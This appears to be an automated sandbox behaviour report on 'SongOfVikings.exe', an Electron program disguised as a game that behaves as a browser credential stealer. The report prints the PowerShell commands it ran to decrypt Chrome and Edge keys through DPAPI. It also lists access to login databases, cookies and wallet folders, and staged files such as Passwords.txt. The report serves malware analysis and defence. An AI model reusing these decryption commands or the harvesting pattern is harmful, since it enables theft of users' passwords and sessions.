Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'currentuser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "c:\users\user\appdata\local\programs\songofvikings\songofvikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\songofvikings" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaabgaaaaaaaaagaaaaaaaaaaiaaaaaaaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'currentuser')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'currentuser')

Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp

Binary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\SongOfVikings\resources VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\d6298ec28377d406207230300ffe3af0.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\cookies.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Autofills.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\Passwords.txt VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation

Source: C:\Users\user\Desktop\SongOfVikings.exe

0_2_0040338F

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
40.66.40.211	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
172.64.41.3	chrome.cloudflare-dns.com	United States	13335	CLOUDFLARENETUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
chrome.cloudflare-dns.com	172.64.41.3	true
api.ipify.org	172.67.74.152	true

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\db56a95c-619a-410d-ad51-8448947b0929.tmp.node

Virustotal: Detection: 6%

Perma Link

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9AFD4FEE CryptUnprotectData,		15_2_00007FFD9AFD4FEE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_00007FFD9AFE4FEE CryptUnprotectData,		18_2_00007FFD9AFE4FEE

Uses 32bit PE files

Source: SongOfVikings.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SongOfVikings.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cdf7078b-99f0-53cc-bffc-b945975ddd33

Jump to behavior

Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	File created: C:\Users\user\AppData\Local\Programs\SongOfVikings\LICENSE.electron.txt			Jump to behavior

Source: SongOfVikings.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: BCC = $(NCC) -nologo -W3 -Fd$*.pdb $(CCOPTS) $(BCCOPTS) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\NODE_SQLITE3.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\NODE_SQLITE3.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: del /Q .exp .lo .ilk .lib .obj .ncb .pdb .sdf *.suo 2>NUL source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: SongOfVikings.exe, 00000000.00000003.1907116496.0000000006529000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: LTCOMPILE = $(TCC) -Fo$@ -Fd$*.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: CLEANFILES="$CLEANFILES .lib .dll .pdb .exp" source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /OUT:"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.NODE" /INCREMENTAL:NO /NOLOGO KERNEL32.LIB USER32.LIB GDI32.LIB WINSPOOL.LIB COMDLG32.LIB ADVAPI32.LIB SHELL32.LIB OLE32.LIB OLEAUT32.LIB UUID.LIB ODBC32.LIB DELAYIMP.LIB "C:\\USERS\\SERC\\.ELECTRON-GYP\\24.8.8\\X64\\NODE.LIB" DELAYIMP.LIB /DELAYLOAD:NODE.EXE /MANIFEST /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.PDB" /OPT:REF /OPT:ICF /TLBID:1 /DYNAMICBASE /NXCOMPAT /MACHINE:X64 /LTCG:INCREMENTAL /ignore:4199 /DLL RELEASE\OBJ\NODE_SQLITE3\WIN_DELAY_LOAD_HOOK.OBJ source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| *.dSYM ) ;; source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1839965990.00000000051BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBCMT.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
